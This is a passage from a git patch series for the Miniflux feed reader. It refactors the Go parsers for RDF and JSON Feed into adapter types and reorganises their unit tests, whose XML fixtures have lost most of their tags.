DublinCoreCreator string `xml:"http://purl.org/dc/elements/1.1/ creator"`
DublinCoreContent string `xml:"http://purl.org/rss/1.0/modules/content/ encoded"`
}
-
-func (item *DublinCoreItemElement) GetSanitizedCreator() string {
- return strings.TrimSpace(sanitizer.StripTags(item.DublinCoreCreator))
-}
diff --git a/internal/reader/rdf/adapter.go b/internal/reader/rdf/adapter.go
new file mode 100644
index 00000000..812badbc
--- /dev/null
+++ b/internal/reader/rdf/adapter.go
@@ -0,0 +1,115 @@
+// SPDX-FileCopyrightText: Copyright The Miniflux Authors. All rights reserved.
+// SPDX-License-Identifier: Apache-2.0
+
+package rdf // import "miniflux.app/v2/internal/reader/rdf"
+
+import (
+ "html"
+ "log/slog"
+ "strings"
+ "time"
+
+ "miniflux.app/v2/internal/crypto"
+ "miniflux.app/v2/internal/model"
+ "miniflux.app/v2/internal/reader/date"
+ "miniflux.app/v2/internal/reader/sanitizer"
+ "miniflux.app/v2/internal/urllib"
+)
+
+type RDFAdapter struct {
+ rdf *RDF
+}
+
+func NewRDFAdapter(rdf *RDF) *RDFAdapter {
+ return &RDFAdapter{rdf}
+}
+
+func (r *RDFAdapter) BuildFeed(feedURL string) *model.Feed {
+ feed := &model.Feed{
+ Title: stripTags(r.rdf.Channel.Title),
+ FeedURL: feedURL,
+ }
+
+ if feed.Title == "" {
+ feed.Title = feedURL
+ }
+
+ if siteURL, err := urllib.AbsoluteURL(feedURL, r.rdf.Channel.Link); err != nil {
+ feed.SiteURL = r.rdf.Channel.Link
+ } else {
+ feed.SiteURL = siteURL
+ }
+
+ for _, item := range r.rdf.Items {
+ entry := model.NewEntry()
+ itemLink := strings.TrimSpace(item.Link)
+
+ // Populate the entry URL.
+ if itemLink == "" {
+ entry.URL = feed.SiteURL // Fallback to the feed URL if the entry URL is empty.
+ } else if entryURL, err := urllib.AbsoluteURL(feed.SiteURL, itemLink); err == nil {
+ entry.URL = entryURL
+ } else {
+ entry.URL = itemLink
+ }
+
+ // Populate the entry title.
+ for _, title := range []string{item.Title, item.DublinCoreTitle} {
+ title = strings.TrimSpace(title)
+ if title != "" {
+ entry.Title = html.UnescapeString(title)
+ break
+ }
+ }
+
+ // If the entry title is empty, we use the entry URL as a fallback.
+ if entry.Title == "" {
+ entry.Title = entry.URL
+ }
+
+ // Populate the entry content.
+ if item.DublinCoreContent != "" {
+ entry.Content = item.DublinCoreContent
+ } else {
+ entry.Content = item.Description
+ }
+
+ // Generate the entry hash.
+ hashValue := itemLink
+ if hashValue == "" {
+ hashValue = item.Title + item.Description // Fallback to the title and description if the link is empty.
+ }
+
+ entry.Hash = crypto.Hash(hashValue)
+
+ // Populate the entry date.
+ entry.Date = time.Now()
+ if item.DublinCoreDate != "" {
+ if itemDate, err := date.Parse(item.DublinCoreDate); err != nil {
+ slog.Debug("Unable to parse date from RDF feed",
+ slog.String("date", item.DublinCoreDate),
+ slog.String("link", itemLink),
+ slog.Any("error", err),
+ )
+ } else {
+ entry.Date = itemDate
+ }
+ }
+
+ // Populate the entry author.
+ switch {
+ case item.DublinCoreCreator != "":
+ entry.Author = stripTags(item.DublinCoreCreator)
+ case r.rdf.Channel.DublinCoreCreator != "":
+ entry.Author = stripTags(r.rdf.Channel.DublinCoreCreator)
+ }
+
+ feed.Entries = append(feed.Entries, entry)
+ }
+
+ return feed
+}
+
+func stripTags(value string) string {
+ return strings.TrimSpace(sanitizer.StripTags(value))
+}
diff --git a/internal/reader/rdf/parser.go b/internal/reader/rdf/parser.go
index 695fb5ce..f743c5d7 100644
--- a/internal/reader/rdf/parser.go
+++ b/internal/reader/rdf/parser.go
@@ -13,10 +13,10 @@ import (
// Parse returns a normalized feed struct from a RDF feed.
func Parse(baseURL string, data io.ReadSeeker) (*model.Feed, error) {
- feed := new(rdfFeed)
- if err := xml.NewXMLDecoder(data).Decode(feed); err != nil {
+ xmlFeed := new(RDF)
+ if err := xml.NewXMLDecoder(data).Decode(xmlFeed); err != nil {
return nil, fmt.Errorf("rdf: unable to parse feed: %w", err)
}
- return feed.Transform(baseURL), nil
+ return NewRDFAdapter(xmlFeed).BuildFeed(baseURL), nil
}
diff --git a/internal/reader/rdf/parser_test.go b/internal/reader/rdf/parser_test.go
index 146c6c95..5009a412 100644
--- a/internal/reader/rdf/parser_test.go
+++ b/internal/reader/rdf/parser_test.go
@@ -228,63 +228,87 @@ func TestParseRDFSampleWithDublinCore(t *testing.T) {
}
}
-func TestParseItemWithOnlyFeedAuthor(t *testing.T) {
+func TestParseRDFFeedWithEmptyTitle(t *testing.T) {
data := `
-
-
-
- Meerkat
- http://meerkat.oreillynet.com
- Rael Dornfest (mailto:rael@oreilly.com)
-
-
-
- XML: A Disruptive Technology
- http://c.moreover.com/click/here.pl?r123
-
- XML is placing increasingly heavy loads on the existing technical
- infrastructure of the Internet.
-
-
+ xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+ xmlns="http://purl.org/rss/1.0/">
+
+ http://example.org/item
+
+
+ Example
+ http://example.org/item
+ Test
+ `
- feed, err := Parse("http://meerkat.oreillynet.com", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://example.org/feed", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- if feed.Entries[0].Author != "Rael Dornfest (mailto:rael@oreilly.com)" {
- t.Errorf("Incorrect entry author, got: %s", feed.Entries[0].Author)
+ if feed.Title != "http://example.org/feed" {
+ t.Errorf(`Incorrect title, got: %q`, feed.Title)
}
}
-func TestParseItemRelativeURL(t *testing.T) {
+func TestParseRDFFeedWithEmptyLink(t *testing.T) {
data := `
-
-
+
+
+ Example Feed
+
+ Example
- http://example.org
-
-
-
- Title
+ http://example.org/item
Test
- something.html
-
+
`
- feed, err := Parse("http://meerkat.oreillynet.com", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://example.org/feed", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- if feed.Entries[0].URL != "http://example.org/something.html" {
- t.Errorf("Incorrect entry url, got: %s", feed.Entries[0].URL)
+ if feed.SiteURL != "http://example.org/feed" {
+ t.Errorf(`Incorrect SiteURL, got: %q`, feed.SiteURL)
+ }
+
+ if feed.FeedURL != "http://example.org/feed" {
+ t.Errorf(`Incorrect FeedURL, got: %q`, feed.FeedURL)
+ }
+}
+
+func TestParseRDFFeedWithRelativeLink(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ /test/index.html
+
+
+ Example
+ http://example.org/item
+ Test
+
+ `
+
+ feed, err := Parse("http://example.org/feed", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.SiteURL != "http://example.org/test/index.html" {
+ t.Errorf(`Incorrect SiteURL, got: %q`, feed.SiteURL)
+ }
+
+ if feed.FeedURL != "http://example.org/feed" {
+ t.Errorf(`Incorrect FeedURL, got: %q`, feed.FeedURL)
}
}
@@ -321,63 +345,7 @@ func TestParseItemWithoutLink(t *testing.T) {
}
}
-func TestParseItemWithDublicCoreDate(t *testing.T) {
- data := `
-
-
- Example
- http://example.org
-
-
-
- Title
- Test
- http://example.org/test.html
- Tester
- 2018-04-10T05:00:00+00:00
-
- `
-
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err != nil {
- t.Fatal(err)
- }
-
- expectedDate := time.Date(2018, time.April, 10, 5, 0, 0, 0, time.UTC)
- if !feed.Entries[0].Date.Equal(expectedDate) {
- t.Errorf("Incorrect entry date, got: %v, want: %v", feed.Entries[0].Date, expectedDate)
- }
-}
-
-func TestParseItemWithEncodedHTMLInDCCreatorField(t *testing.T) {
- data := `
-
-
- Example
- http://example.org
-
-
-
- Title
- Test
- http://example.org/test.html
- <a href="http://example.org/author1">Author 1</a> (University 1), <a href="http://example.org/author2">Author 2</a> (University 2)
- 2018-04-10T05:00:00+00:00
-
- `
-
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err != nil {
- t.Fatal(err)
- }
-
- expectedAuthor := "Author 1 (University 1), Author 2 (University 2)"
- if feed.Entries[0].Author != expectedAuthor {
- t.Errorf("Incorrect entry author, got: %s, want: %s", feed.Entries[0].Author, expectedAuthor)
- }
-}
-
-func TestParseItemWithoutDate(t *testing.T) {
+func TestParseItemRelativeURL(t *testing.T) {
data := `
@@ -388,90 +356,17 @@ func TestParseItemWithoutDate(t *testing.T) {
TitleTest
- http://example.org/test.html
+ something.html
`
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://meerkat.oreillynet.com", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- expectedDate := time.Now().In(time.Local)
- diff := expectedDate.Sub(feed.Entries[0].Date)
- if diff > time.Second {
- t.Errorf("Incorrect entry date, got: %v", diff)
- }
-}
-
-func TestParseItemWithEncodedHTMLTitle(t *testing.T) {
- data := `
-
-
- Example
- http://example.org
-
-
-
- AT&T
- Test
- http://example.org/test.html
-
- `
-
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err != nil {
- t.Fatal(err)
- }
-
- if feed.Entries[0].Title != `AT&T` {
- t.Errorf("Incorrect entry title, got: %q", feed.Entries[0].Title)
- }
-}
-
-func TestParseInvalidXml(t *testing.T) {
- data := `garbage`
- _, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err == nil {
- t.Fatal("Parse should returns an error")
- }
-}
-
-func TestParseFeedWithHTMLEntity(t *testing.T) {
- data := `
-
-
- Example Feed
- http://example.org
-
- `
-
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err != nil {
- t.Fatal(err)
- }
-
- if feed.Title != "Example \u00a0 Feed" {
- t.Errorf(`Incorrect title, got: %q`, feed.Title)
- }
-}
-
-func TestParseFeedWithInvalidCharacterEntity(t *testing.T) {
- data := `
-
-
- Example Feed
- http://example.org/a&b
-
- `
-
- feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
- if err != nil {
- t.Fatal(err)
- }
-
- if feed.SiteURL != "http://example.org/a&b" {
- t.Errorf(`Incorrect URL, got: %q`, feed.SiteURL)
+ if feed.Entries[0].URL != "http://example.org/something.html" {
+ t.Errorf("Incorrect entry url, got: %s", feed.Entries[0].URL)
}
}
@@ -539,6 +434,130 @@ func TestParseFeedWithURLWrappedInSpaces(t *testing.T) {
}
}
+func TestParseRDFItemWitEmptyTitleElement(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ http://example.org/
+
+
+
+ http://example.org/item
+ Test
+
+ `
+
+ feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries) != 1 {
+ t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
+ }
+
+ expected := `http://example.org/item`
+ result := feed.Entries[0].Title
+ if result != expected {
+ t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ }
+}
+
+func TestParseRDFItemWithDublinCoreTitleElement(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ http://example.org/
+
+
+ Dublin Core Title
+ http://example.org/
+ Test
+
+ `
+
+ feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries) != 1 {
+ t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
+ }
+
+ expected := `Dublin Core Title`
+ result := feed.Entries[0].Title
+ if result != expected {
+ t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ }
+}
+
+func TestParseRDFItemWithDuplicateTitleElement(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ http://example.org/
+
+
+ Item Title
+
+ http://example.org/
+ Test
+
+ `
+
+ feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries) != 1 {
+ t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
+ }
+
+ expected := `Item Title`
+ result := feed.Entries[0].Title
+ if result != expected {
+ t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ }
+}
+
+func TestParseItemWithEncodedHTMLTitle(t *testing.T) {
+ data := `
+
+
+ Example
+ http://example.org
+
+
+
+ AT&T
+ Test
+ http://example.org/test.html
+
+ `
+
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Title != `AT&T` {
+ t.Errorf("Incorrect entry title, got: %q", feed.Entries[0].Title)
+ }
+}
+
func TestParseRDFWithContentEncoded(t *testing.T) {
data := `
-
-
- Example Feed
- http://example.org/
-
-
- Item Title
-
- http://example.org/
+
+
+ Example
+ http://example.org
+
+
+
+ TitleTest
-
+ http://example.org/test.html
+ `
- feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- if len(feed.Entries) != 1 {
- t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
- }
-
- expected := `Item Title`
- result := feed.Entries[0].Title
- if result != expected {
- t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ expectedDate := time.Now().In(time.Local)
+ diff := expectedDate.Sub(feed.Entries[0].Date)
+ if diff > time.Second {
+ t.Errorf("Incorrect entry date, got: %v", diff)
}
}
-func TestParseRDFItemWithDublinCoreTitleElement(t *testing.T) {
+func TestParseItemWithDublicCoreDate(t *testing.T) {
data := `
-
-
- Example Feed
- http://example.org/
-
-
- Dublin Core Title
- http://example.org/
+
+
+ Example
+ http://example.org
+
+
+
+ TitleTest
-
+ http://example.org/test.html
+ Tester
+ 2018-04-10T05:00:00+00:00
+ `
- feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- if len(feed.Entries) != 1 {
- t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
- }
-
- expected := `Dublin Core Title`
- result := feed.Entries[0].Title
- if result != expected {
- t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ expectedDate := time.Date(2018, time.April, 10, 5, 0, 0, 0, time.UTC)
+ if !feed.Entries[0].Date.Equal(expectedDate) {
+ t.Errorf("Incorrect entry date, got: %v, want: %v", feed.Entries[0].Date, expectedDate)
}
}
-func TestParseRDFItemWitEmptyTitleElement(t *testing.T) {
+func TestParseItemWithInvalidDublicCoreDate(t *testing.T) {
data := `
-
-
- Example Feed
- http://example.org/
-
-
-
- http://example.org/item
+
+
+ Example
+ http://example.org
+
+
+
+ TitleTest
-
+ http://example.org/test.html
+ Tester
+ 20-04-10T05:00:00+00:00
+ `
- feed, err := Parse("http://example.org/", bytes.NewReader([]byte(data)))
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
if err != nil {
t.Fatal(err)
}
- if len(feed.Entries) != 1 {
- t.Fatalf(`Unexpected number of entries, got %d`, len(feed.Entries))
- }
-
- expected := `http://example.org/item`
- result := feed.Entries[0].Title
- if result != expected {
- t.Errorf(`Unexpected entry title, got %q instead of %q`, result, expected)
+ expectedDate := time.Now().In(time.Local)
+ diff := expectedDate.Sub(feed.Entries[0].Date)
+ if diff > time.Second {
+ t.Errorf("Incorrect entry date, got: %v", diff)
+ }
+}
+
+func TestParseItemWithEncodedHTMLInDCCreatorField(t *testing.T) {
+ data := `
+
+
+ Example
+ http://example.org
+
+
+
+ Title
+ Test
+ http://example.org/test.html
+ <a href="http://example.org/author1">Author 1</a> (University 1), <a href="http://example.org/author2">Author 2</a> (University 2)
+ 2018-04-10T05:00:00+00:00
+
+ `
+
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ expectedAuthor := "Author 1 (University 1), Author 2 (University 2)"
+ if feed.Entries[0].Author != expectedAuthor {
+ t.Errorf("Incorrect entry author, got: %s, want: %s", feed.Entries[0].Author, expectedAuthor)
+ }
+}
+
+func TestParseItemWithOnlyFeedAuthor(t *testing.T) {
+ data := `
+
+
+
+ Meerkat
+ http://meerkat.oreillynet.com
+ Rael Dornfest (mailto:rael@oreilly.com)
+
+
+
+ XML: A Disruptive Technology
+ http://c.moreover.com/click/here.pl?r123
+
+ XML is placing increasingly heavy loads on the existing technical
+ infrastructure of the Internet.
+
+
+ `
+
+ feed, err := Parse("http://meerkat.oreillynet.com", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Author != "Rael Dornfest (mailto:rael@oreilly.com)" {
+ t.Errorf("Incorrect entry author, got: %s", feed.Entries[0].Author)
+ }
+}
+
+func TestParseInvalidXml(t *testing.T) {
+ data := `garbage`
+ _, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ if err == nil {
+ t.Fatal("Parse should returns an error")
+ }
+}
+
+func TestParseFeedWithHTMLEntity(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ http://example.org
+
+ `
+
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Title != "Example \u00a0 Feed" {
+ t.Errorf(`Incorrect title, got: %q`, feed.Title)
+ }
+}
+
+func TestParseFeedWithInvalidCharacterEntity(t *testing.T) {
+ data := `
+
+
+ Example Feed
+ http://example.org/a&b
+
+ `
+
+ feed, err := Parse("http://example.org", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.SiteURL != "http://example.org/a&b" {
+ t.Errorf(`Incorrect URL, got: %q`, feed.SiteURL)
}
}
diff --git a/internal/reader/rdf/rdf.go b/internal/reader/rdf/rdf.go
index 8ce454d7..5adaeeb9 100644
--- a/internal/reader/rdf/rdf.go
+++ b/internal/reader/rdf/rdf.go
@@ -5,130 +5,27 @@ package rdf // import "miniflux.app/v2/internal/reader/rdf"
import (
"encoding/xml"
- "html"
- "log/slog"
- "strings"
- "time"
- "miniflux.app/v2/internal/crypto"
- "miniflux.app/v2/internal/model"
- "miniflux.app/v2/internal/reader/date"
"miniflux.app/v2/internal/reader/dublincore"
- "miniflux.app/v2/internal/reader/sanitizer"
- "miniflux.app/v2/internal/urllib"
)
-type rdfFeed struct {
- XMLName xml.Name `xml:"RDF"`
- Title string `xml:"channel>title"`
- Link string `xml:"channel>link"`
- Items []rdfItem `xml:"item"`
- dublincore.DublinCoreFeedElement
+// RDF sepcs: https://web.resource.org/rss/1.0/spec
+type RDF struct {
+ XMLName xml.Name `xml:"http://www.w3.org/1999/02/22-rdf-syntax-ns# RDF"`
+ Channel RDFChannel `xml:"channel"`
+ Items []RDFItem `xml:"item"`
}
-func (r *rdfFeed) Transform(baseURL string) *model.Feed {
- var err error
- feed := new(model.Feed)
- feed.Title = sanitizer.StripTags(r.Title)
- feed.FeedURL = baseURL
- feed.SiteURL, err = urllib.AbsoluteURL(baseURL, r.Link)
- if err != nil {
- feed.SiteURL = r.Link
- }
-
- for _, item := range r.Items {
- entry := item.Transform()
- if entry.Author == "" && r.DublinCoreCreator != "" {
- entry.Author = r.GetSanitizedCreator()
- }
-
- if entry.URL == "" {
- entry.URL = feed.SiteURL
- } else {
- entryURL, err := urllib.AbsoluteURL(feed.SiteURL, entry.URL)
- if err == nil {
- entry.URL = entryURL
- }
- }
-
- feed.Entries = append(feed.Entries, entry)
- }
-
- return feed
+type RDFChannel struct {
+ Title string `xml:"title"`
+ Link string `xml:"link"`
+ Description string `xml:"description"`
+ dublincore.DublinCoreChannelElement
}
-type rdfItem struct {
+type RDFItem struct {
Title string `xml:"http://purl.org/rss/1.0/ title"`
Link string `xml:"link"`
Description string `xml:"description"`
dublincore.DublinCoreItemElement
}
-
-func (r *rdfItem) Transform() *model.Entry {
- entry := model.NewEntry()
- entry.Title = r.entryTitle()
- entry.Author = r.entryAuthor()
- entry.URL = r.entryURL()
- entry.Content = r.entryContent()
- entry.Hash = r.entryHash()
- entry.Date = r.entryDate()
-
- if entry.Title == "" {
- entry.Title = entry.URL
- }
- return entry
-}
-
-func (r *rdfItem) entryTitle() string {
- for _, title := range []string{r.Title, r.DublinCoreTitle} {
- title = strings.TrimSpace(title)
- if title != "" {
- return html.UnescapeString(title)
- }
- }
- return ""
-}
-
-func (r *rdfItem) entryContent() string {
- switch {
- case r.DublinCoreContent != "":
- return r.DublinCoreContent
- default:
- return r.Description
- }
-}
-
-func (r *rdfItem) entryAuthor() string {
- return r.GetSanitizedCreator()
-}
-
-func (r *rdfItem) entryURL() string {
- return strings.TrimSpace(r.Link)
-}
-
-func (r *rdfItem) entryDate() time.Time {
- if r.DublinCoreDate != "" {
- result, err := date.Parse(r.DublinCoreDate)
- if err != nil {
- slog.Debug("Unable to parse date from RDF feed",
- slog.String("date", r.DublinCoreDate),
- slog.String("link", r.Link),
- slog.Any("error", err),
- )
- return time.Now()
- }
-
- return result
- }
-
- return time.Now()
-}
-
-func (r *rdfItem) entryHash() string {
- value := r.Link
- if value == "" {
- value = r.Title + r.Description
- }
-
- return crypto.Hash(value)
-}
From 8429c6b0abfbfe3d0ef8eea1eb8aceff810d3069 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Tue, 12 Mar 2024 22:10:59 -0700
Subject: [PATCH 05/80] Refactor JSON Feed parser to use an adapter
---
internal/reader/json/adapter.go | 173 +++++++++++++++
internal/reader/json/json.go | 320 +++++++++++-----------------
internal/reader/json/parser.go | 6 +-
internal/reader/json/parser_test.go | 241 ++++++++++++++++-----
4 files changed, 487 insertions(+), 253 deletions(-)
create mode 100644 internal/reader/json/adapter.go
diff --git a/internal/reader/json/adapter.go b/internal/reader/json/adapter.go
new file mode 100644
index 00000000..d62ff976
--- /dev/null
+++ b/internal/reader/json/adapter.go
@@ -0,0 +1,173 @@
+// SPDX-FileCopyrightText: Copyright The Miniflux Authors. All rights reserved.
+// SPDX-License-Identifier: Apache-2.0
+
+package json // import "miniflux.app/v2/internal/reader/json"
+
+import (
+ "log/slog"
+ "sort"
+ "strings"
+ "time"
+
+ "miniflux.app/v2/internal/crypto"
+ "miniflux.app/v2/internal/model"
+ "miniflux.app/v2/internal/reader/date"
+ "miniflux.app/v2/internal/reader/sanitizer"
+ "miniflux.app/v2/internal/urllib"
+)
+
+type JSONAdapter struct {
+ jsonFeed *JSONFeed
+}
+
+func NewJSONAdapter(jsonFeed *JSONFeed) *JSONAdapter {
+ return &JSONAdapter{jsonFeed}
+}
+
+func (j *JSONAdapter) BuildFeed(feedURL string) *model.Feed {
+ feed := &model.Feed{
+ Title: strings.TrimSpace(j.jsonFeed.Title),
+ FeedURL: j.jsonFeed.FeedURL,
+ SiteURL: j.jsonFeed.HomePageURL,
+ }
+
+ if feed.FeedURL == "" {
+ feed.FeedURL = feedURL
+ }
+
+ // Fallback to the feed URL if the site URL is empty.
+ if feed.SiteURL == "" {
+ feed.SiteURL = feed.FeedURL
+ }
+
+ if feedURL, err := urllib.AbsoluteURL(feedURL, j.jsonFeed.FeedURL); err == nil {
+ feed.FeedURL = feedURL
+ }
+
+ if siteURL, err := urllib.AbsoluteURL(feedURL, j.jsonFeed.HomePageURL); err == nil {
+ feed.SiteURL = siteURL
+ }
+
+ // Fallback to the feed URL if the title is empty.
+ if feed.Title == "" {
+ feed.Title = feed.SiteURL
+ }
+
+ // Populate the icon URL if present.
+ for _, iconURL := range []string{j.jsonFeed.FaviconURL, j.jsonFeed.IconURL} {
+ iconURL = strings.TrimSpace(iconURL)
+ if iconURL != "" {
+ if absoluteIconURL, err := urllib.AbsoluteURL(feed.SiteURL, iconURL); err == nil {
+ feed.IconURL = absoluteIconURL
+ break
+ }
+ }
+ }
+
+ for _, item := range j.jsonFeed.Items {
+ entry := model.NewEntry()
+ entry.Title = strings.TrimSpace(item.Title)
+ entry.URL = strings.TrimSpace(item.URL)
+
+ // Make sure the entry URL is absolute.
+ if entryURL, err := urllib.AbsoluteURL(feed.SiteURL, entry.URL); err == nil {
+ entry.URL = entryURL
+ }
+
+ // The entry title is optional, so we need to find a fallback.
+ if entry.Title == "" {
+ for _, value := range []string{item.Summary, item.ContentText, item.ContentHTML} {
+ if value != "" {
+ entry.Title = sanitizer.TruncateHTML(value, 100)
+ }
+ }
+ }
+
+ // Fallback to the entry URL if the title is empty.
+ if entry.Title == "" {
+ entry.Title = entry.URL
+ }
+
+ // Populate the entry content.
+ for _, value := range []string{item.ContentHTML, item.ContentText, item.Summary} {
+ value = strings.TrimSpace(value)
+ if value != "" {
+ entry.Content = value
+ break
+ }
+ }
+
+ // Populate the entry date.
+ entry.Date = time.Now()
+ for _, value := range []string{item.DatePublished, item.DateModified} {
+ value = strings.TrimSpace(value)
+ if value != "" {
+ if date, err := date.Parse(value); err != nil {
+ slog.Debug("Unable to parse date from JSON feed",
+ slog.String("date", value),
+ slog.String("url", entry.URL),
+ slog.Any("error", err),
+ )
+ } else {
+ entry.Date = date
+ break
+ }
+ }
+ }
+
+ // Populate the entry author.
+ itemAuthors := append(item.Authors, j.jsonFeed.Authors...)
+ itemAuthors = append(itemAuthors, item.Author, j.jsonFeed.Author)
+
+ authorNamesMap := make(map[string]bool)
+ for _, author := range itemAuthors {
+ authorName := strings.TrimSpace(author.Name)
+ if authorName != "" {
+ authorNamesMap[authorName] = true
+ }
+ }
+
+ var authors []string
+ for authorName := range authorNamesMap {
+ authors = append(authors, authorName)
+ }
+
+ sort.Strings(authors)
+ entry.Author = strings.Join(authors, ", ")
+
+ // Populate the entry enclosures.
+ for _, attachment := range item.Attachments {
+ attachmentURL := strings.TrimSpace(attachment.URL)
+ if attachmentURL != "" {
+ if absoluteAttachmentURL, err := urllib.AbsoluteURL(feed.SiteURL, attachmentURL); err == nil {
+ entry.Enclosures = append(entry.Enclosures, &model.Enclosure{
+ URL: absoluteAttachmentURL,
+ MimeType: attachment.MimeType,
+ Size: attachment.Size,
+ })
+ }
+ }
+ }
+
+ // Populate the entry tags.
+ for _, tag := range item.Tags {
+ tag = strings.TrimSpace(tag)
+ if tag != "" {
+ entry.Tags = append(entry.Tags, tag)
+ }
+ }
+
+ // Generate a hash for the entry.
+ for _, value := range []string{item.ID, item.URL, item.ContentText + item.ContentHTML + item.Summary} {
+ value = strings.TrimSpace(value)
+ if value != "" {
+ entry.Hash = crypto.Hash(value)
+ break
+ }
+ }
+
+ feed.Entries = append(feed.Entries, entry)
+ }
+
+ return feed
+}
diff --git a/internal/reader/json/json.go b/internal/reader/json/json.go
index c6920947..58a06006 100644
--- a/internal/reader/json/json.go
+++ b/internal/reader/json/json.go
@@ -3,207 +3,141 @@
package json // import "miniflux.app/v2/internal/reader/json"
-import (
- "log/slog"
- "strings"
- "time"
+// JSON Feed specs:
+// https://www.jsonfeed.org/version/1.1/
+// https://www.jsonfeed.org/version/1/
+type JSONFeed struct {
+ // Version is the URL of the version of the format the feed uses.
+ // This should appear at the very top, though we recognize that not all JSON generators allow for ordering.
+ Version string `json:"version"`
- "miniflux.app/v2/internal/crypto"
- "miniflux.app/v2/internal/model"
- "miniflux.app/v2/internal/reader/date"
- "miniflux.app/v2/internal/reader/sanitizer"
- "miniflux.app/v2/internal/urllib"
-)
+ // Title is the name of the feed, which will often correspond to the name of the website.
+ Title string `json:"title"`
-type jsonFeed struct {
- Version string `json:"version"`
- Title string `json:"title"`
- SiteURL string `json:"home_page_url"`
- IconURL string `json:"icon"`
- FaviconURL string `json:"favicon"`
- FeedURL string `json:"feed_url"`
- Authors []jsonAuthor `json:"authors"`
- Author jsonAuthor `json:"author"`
- Items []jsonItem `json:"items"`
+ // HomePageURL is the URL of the resource that the feed describes.
+ // This resource may or may not actually be a “home” page, but it should be an HTML page.
+ HomePageURL string `json:"home_page_url"`
+
+ // FeedURL is the URL of the feed, and serves as the unique identifier for the feed.
+ FeedURL string `json:"feed_url"`
+
+ // Description provides more detail, beyond the title, on what the feed is about.
+ Description string `json:"description"`
+
+ // IconURL is the URL of an image for the feed suitable to be used in a timeline, much the way an avatar might be used.
+ IconURL string `json:"icon"`
+
+ // FaviconURL is the URL of an image for the feed suitable to be used in a source list. It should be square and relatively small.
+ FaviconURL string `json:"favicon"`
+
+ // Authors specifies one or more feed authors. The author object has several members.
+ Authors []JSONAuthor `json:"authors"` // JSON Feed v1.1
+
+ // Author specifies the feed author. The author object has several members.
+ // JSON Feed v1 (deprecated)
+ Author JSONAuthor `json:"author"`
+
+ // Language is the primary language for the feed in the format specified in RFC 5646.
+ // The value is usually a 2-letter language tag from ISO 639-1, optionally followed by a region tag. (Examples: en or en-US.)
+ Language string `json:"language"`
+
+ // Expired is a boolean value that specifies whether or not the feed is finished.
+ Expired bool `json:"expired"`
+
+ // Items is an array, each representing an individual item in the feed.
+ Items []JSONItem `json:"items"`
+
+ // Hubs describes endpoints that can be used to subscribe to real-time notifications from the publisher of this feed.
+ Hubs []JSONHub `json:"hubs"`
}
-type jsonAuthor struct {
+type JSONAuthor struct {
+ // Author's name.
Name string `json:"name"`
- URL string `json:"url"`
+
+ // Author's website URL (Blog or micro-blog).
+ WebsiteURL string `json:"url"`
+
+ // Author's avatar URL.
+ AvatarURL string `json:"avatar"`
}
-type jsonItem struct {
- ID string `json:"id"`
- URL string `json:"url"`
- Title string `json:"title"`
- Summary string `json:"summary"`
- Text string `json:"content_text"`
- HTML string `json:"content_html"`
- DatePublished string `json:"date_published"`
- DateModified string `json:"date_modified"`
- Authors []jsonAuthor `json:"authors"`
- Author jsonAuthor `json:"author"`
- Attachments []jsonAttachment `json:"attachments"`
- Tags []string `json:"tags"`
+type JSONHub struct {
